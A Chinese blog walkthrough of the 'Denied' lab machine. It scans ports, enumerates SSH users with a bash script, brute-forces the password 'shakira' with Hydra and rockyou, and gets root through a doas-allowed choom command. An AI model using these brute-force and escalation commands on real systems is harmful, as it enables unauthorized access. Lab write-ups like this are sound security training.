Vulnhub Linux 权限提升 SSH 密码爆破 Web渗透

Denied

Posted by axlfpe on 2025-06-09
Estimated Reading Time 11 Minutes
Words 2.2k In Total
Viewed Times

Denied

靶机ip:192.168.108.137

攻击机ip:192.168.108.50

靶机地址:https://vulnyx.com/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
Kal ddddx ~ ❯ export ip=192.168.108.137                                                                     at 14:10:09
Kal ddddx ~ ❯ rustscan -a $ip                                                                               at 14:10:17
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Making sure 'closed' isn't just a state of mind.

[~] The config file is expected to be at "/home/ddddx/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.108.137:22
Open 192.168.108.137:80
Open 192.168.108.137:8080
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-09 14:10 CST
Initiating ARP Ping Scan at 14:10
Scanning 192.168.108.137 [1 port]
Completed ARP Ping Scan at 14:10, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:10
Completed Parallel DNS resolution of 1 host. at 14:10, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:10
Scanning 192.168.108.137 [3 ports]
Discovered open port 80/tcp on 192.168.108.137
Discovered open port 8080/tcp on 192.168.108.137
Discovered open port 22/tcp on 192.168.108.137
Completed SYN Stealth Scan at 14:10, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.108.137
Host is up, received arp-response (0.00089s latency).
Scanned at 2025-06-09 14:10:25 CST for 0s

PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 64
80/tcp   open  http       syn-ack ttl 64
8080/tcp open  http-proxy syn-ack ttl 64
MAC Address: 08:00:27:87:FB:37 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)
端口号 协议 服务 描述
22 TCP SSH 远程登录服务,可能存在弱口令或爆破风险
80 TCP HTTP Web 服务,常见漏洞包括 XSS、SQL 注入、目录遍历等
8080 TCP HTTP-Proxy 可能是另一个 Web 应用或反向代理,也值得重点关注

开放了22,80和8080端口,尝试访问一下,80和8080都为apache的默认页面,尝试一下目录爆破,发现也是一样的所以它们可能是同一个 Web 服务的不同监听端口

图片.png

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
Kal ddddx ~ ❯ gobuster dir -u http://192.168.108.137 -w /usr/share/wordlists/dirb/common.txt -t 50  took 6s at 14:10:25
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.108.137
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 280]
/.hta                 (Status: 403) [Size: 280]
/.htpasswd            (Status: 403) [Size: 280]
/index.html           (Status: 200) [Size: 10701]
/server-status        (Status: 403) [Size: 280]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
Kal ddddx ~ ❯ gobuster dir -u http://192.168.108.137:8080 -w /usr/share/wordlists/dirb/common.txt -t 50     at 14:14:21
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.108.137:8080
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 282]
/.htpasswd            (Status: 403) [Size: 282]
/.htaccess            (Status: 403) [Size: 282]
/index.html           (Status: 200) [Size: 10701]
/server-status        (Status: 403) [Size: 282]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

尝试22端口,先直接尝试登录root,用户名存在,但密码错误,看作者这里是直接写了爆破用户名的脚本

1
2
3
4
5
6
7
Kal ddddx ~ ❯ ssh root@192.168.108.137                                                                ✘ 255 at 14:22:55
The authenticity of host '192.168.108.137 (192.168.108.137)' can't be established.
ED25519 key fingerprint is SHA256:4K6G5c0oerBJXgd6BnT2Q3J+i/dOR4+6rQZf20TIk/U.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.108.137' (ED25519) to the list of known hosts.
root@192.168.108.137: Permission denied (publickey).
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#!/bin/bash 
#指定使用bash解释器执行此脚本
# 设置中断信号处理函数
trap ctrl_c INT
# 定义颜色代码
RED="\e[91m"    # 红色
GREEN="\e[92m"  # 绿色
YELLOW="\e[93m" # 黄色
BLUE="\e[34m"   # 蓝色
WHITE="\e[97m"  # 白色
# 从names.txt文件读取用户名列表到USERS变量
USERS=$(<names.txt)
# 设置目标主机IP
RHOST="192.168.108.137"
# 设置SSH端口号
RPORT="22"
# 定义ctrl_c函数,当用户按下Ctrl+C时执行
function ctrl_c(){ 
 echo  
 exit 1
}
# 遍历USERS中的每个用户名
for USER in ${USERS}; do 
 # 尝试SSH连接,超时时间0.5秒  
 # -o StrictHostKeyChecking=no 表示不检查主机密钥  
 # &>/dev/null 将标准输出和错误输出重定向到/dev/null  
 timeout 0.5 ssh ${USER}@${RHOST} -p ${RPORT} -o StrictHostKeyChecking=no &>/dev/null    
 # 检查上一个命令的退出状态  
 # 如果退出状态不等于255(SSH连接失败),说明连接成功 
  if [ $? -ne 255 ]; then    
  # 打印成功信息,使用颜色标记    
    echo -e "${BLUE}SSH    ${WHITE}${RHOST}:${RPORT}  ${GREEN}[+] ${WHITE}User ${GREEN}${USER} ${YELLOW}(Pwn3d!)"    
  # 找到有效用户后退出脚本    
   exit  else    
  # 打印失败信息,使用颜色标记    
    echo -e "${BLUE}SSH    ${WHITE}${RHOST}:${RPORT}  ${RED}[-] ${WHITE}User ${RED}${USER} ${WHITE}Permission denied (publickey)"  
   fi
  done

有了用户名使用 hydra尝试爆破密码,成功爆破,有用户名有密码ssh

登录

  • 找到正确密码后立刻退出(f);
  • 忽略上次任务的恢复记录(I);
1
2
3
4
5
6
7
8
9
10
11
12
13
Kal ddddx ~ ❯ hydra -I -l akira -P /usr/share/wordlists/rockyou.txt ssh://192.168.108.137 -t 64 -f took 48s at 15:01:49
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-06-09 15:01:52
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://192.168.108.137:22/

 [22][ssh] host: 192.168.108.137   login: akira   password: shakira
[STATUS] attack finished for 192.168.108.137 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-09 15:02:43

图片.png

图片.png

1
2
akira@denied:~$ sudo -l
-bash: sudo: orden no encontrada

sudo -l 发现没有安装sudo ,不过我们可以使用其他方法来查看有没有suid权限程序

1
2
3
4
5
6
7
8
9
10
11
12
find / -perm -4000 -type f 2>/dev/null
/usr/bin/mount
/usr/bin/chsh
/usr/bin/doas
/usr/bin/passwd
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/umount
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysig
程序路径 是否可利用提权 分析说明
/usr/bin/mount, /usr/bin/umount 正常工具,参数受限,难以利用
/usr/bin/chsh, /usr/bin/chfn ⚠️ 可设置 shell,可能有用(见下)
/usr/bin/passwd, /usr/bin/su, /usr/bin/newgrp, /usr/bin/gpasswd 标准 SUID 程序,受限
/usr/lib/openssh/ssh-keysign 特殊用途,不可直接利用
/usr/lib/dbus-1.0/dbus-daemon-launch-helper ⚠️ 可能存在漏洞(需根据系统版本)
/usr/bin/doas ✅ 可能利用 重点关注:可能是 sudo 替代品

图片.png

接下来也是爆破直接按作者的来吧

1
ls -l /usr/bin/ | awk '{print $9}' > bins.dic

逐步解释:

ls -l /usr/bin/

  • ls: 列出目录内容。
  • l: 使用 长格式 显示每个文件的详细信息(权限、所有者、大小、时间等)。
  • /usr/bin/: 要列出的目录,里面包含系统的大部分命令和可执行文件。

| awk '{print $9}'

  • |: 管道符,把 ls -l 的输出传给 awk 处理。
  • awk '{print $9}': 提取每行的第 9 个字段(字段是以空格或制表符分隔的),这个字段通常是 文件名
1
while read -r bin; do doas -n /usr/bin/"$bin" --help >/dev/null 2>&1; ec=$?; if [ $ec -eq 0 ]; then echo "[+] $bin allowed"; elif [ $ec -ne 1 ]; then echo "[-] $bin denied (exit $ec)"; fi; done < bins.dic

表格讲解:

部分 含义 作用
while read -r bin 逐行读取 bins.dic 文件 每次循环读取一个二进制文件名,赋值给变量 bin
doas -n /usr/bin/"$bin" --help >/dev/null 2>&1 以非交互模式 (-n) 使用 doas 尝试运行该命令的 --help 选项 判断当前用户是否被允许执行这个命令
ec=$? 保存上一条命令的退出状态码 退出码是判断是否成功执行的关键
if [ $ec -eq 0 ] 判断退出码是否为 0 0 表示执行成功,说明允许运行该命令
echo "[+] $bin allowed" 输出成功信息 显示该命令是被允许执行的
elif [ $ec -ne 1 ] 如果不是常规的 --help 错误 1 可能是权限错误或其他异常
echo "[-] $bin denied (exit $ec)" 输出拒绝信息 显示该命令不能通过 doas 执行
done < bins.dic 循环结束,读取文件 bins.dic 文件中读取命令名 
1
doas /usr/bin/choom -n 0 /bin/sh

图片.png

如果您喜欢此博客或发现它对您有用,则欢迎对此发表评论。 也欢迎您共享此博客,以便更多人可以参与。 如果博客中使用的图像侵犯了您的版权,请与作者联系以将其删除。 谢谢 !

特色标签
Vulnhub Linux 权限提升 SSH 密码爆破 Web渗透
链友
ESC